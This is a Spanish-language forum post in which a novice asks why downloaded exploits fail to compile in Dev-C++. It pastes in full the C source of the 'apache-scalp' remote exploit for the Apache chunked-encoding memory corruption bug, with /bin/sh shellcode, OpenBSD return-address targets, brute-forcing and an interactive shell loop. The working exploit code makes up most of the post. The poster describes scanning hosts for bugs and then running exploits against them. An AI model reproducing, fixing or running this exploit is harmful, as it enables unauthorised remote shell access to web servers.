Ej: encuentro esta vulne.. : Apache Chunked-Encoding Memory Corruption Vulnerability, Count.cgi (wwwcount) Buffer Overflow Vulnerability, etc
busco en un bugtraq el exploit: me lo bajo... y es en .c , lo abro con el devc++, archivo-nuevo-proyecto, pongo un nombre, elijo "en c", "console appliccacion", eligo la carpeta en donde quiero q se cree el proyecto, cierro la ventana con el codigo q me aparece, al proyecto de sumo el codigo de fuente del exploit (me ahorraria todos estos pasos si le doy doble click al codigo q me baje con el icono del devc++)...
Lo compilo... da error... y Game Over.... :S
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#define EXPLOIT_TIMEOUT
5
/* num seconds to wait before assuming it failed */
#define RET_ADDR_INC
512
#define MEMCPY_s1_OWADDR_DELTA
-146
#define PADSIZE_1
4
#define PADSIZE_2
5
#define PADSIZE_3
7
#define REP_POPULATOR
24
#define REP_RET_ADDR
6
#define REP_ZERO
36
#define REP_SHELLCODE
24
#define NOPCOUNT
1024
#define NOP
0x41
#define PADDING_1
'A'
#define PADDING_2
'B'
#define PADDING_3
'C'
#define PUT_STRING(s)
memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)
memset(p, b, n); p += n;
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";
struct {
char *type;
u_long retaddr;
} targets[] = {
// hehe, yes theo, that say OpenBSD here!
{ "OpenBSD 3.0 x86 / Apache 1.3.20",
0xcf92f },
{ "OpenBSD 3.0 x86 / Apache 1.3.22",
0x8f0aa },
{ "OpenBSD 3.0 x86 / Apache 1.3.24",
0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20",
0x8f2a6 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23",
0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24",
0x9011a },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",
0x932ae },
};
int main(int argc, char *argv[]) {
char *hostp, *portp;
unsigned char buf[512], *expbuf, *p;
int i, j, lport;
int sock;
int bruteforce, owned, progress;
u_long retaddr;
struct sockaddr_in sin, from;
if(argc != 3) {
printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
printf("\n--- --- - Potential targets list - --- ----\n");
printf("Target ID / Target specification\n");
for(i = 0; i < sizeof(targets)/8; i++)
printf("\t%d / %s\n", i, targets[i].type);
return -1;
}
hostp = strtok(argv[2], ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
retaddr = strtoul(argv[1], NULL, 16);
if(retaddr < sizeof(targets)/8) {
retaddr = targets[retaddr].retaddr;
bruteforce = 0;
}
else
bruteforce = 1;
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
i = retaddr & 0xff;
if(i == 0x0a || i == 0x0d)
retaddr++;
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
continue;
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(hostp);
sin.sin_port = htons(atoi(portp));
if(!progress)
printf("\n[*] Connecting.. ");
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror("connect()");
exit(1);
}
if(!progress)
printf("connected!\n");
/* Setup the local port in our shellcode */
i = sizeof(from);
if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
perror("getsockname()");
exit(1);
}
lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));
PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("\r\n");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}
PUT_BYTES(REP_ZERO, 0);
PUT_STRING("\r\n");
}
PUT_STRING("Transfer-Encoding: chunked\r\n");
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
retaddr, (unsigned int)(p - expbuf), lport);
memset(buf + strlen(buf), ' ', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(';');
}
else
putchar((rand()%2)? 'P': 'p');
fflush(stdout);
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
printf("\nGOBBLE GOBBLE!@#%%)*#\n");
printf("retaddr 0x%lx did the trick!\n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");
write(sock, expbuf, strlen(expbuf));
owned++;
}
write(1, buf, n);
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!\n");
return -1;
}
}
return 0;
}
Autor
hasta que me doy cuenta de algo que no se y que no lo encontre :'( ??? . Mi problema... y creo que el de muchos (perdon por ser ignorante.. trato de aprender y respetar) es que.... scaneo, encuentro un bugs, navego hasta encontrar el codigo de fuente de esa Vulnerabilidad, abro el devc++, voy a archivo-nuevo-codigo de fuente... pego el codigo que encontre.. lo compilo y
zergothic@hotmail.com
En línea
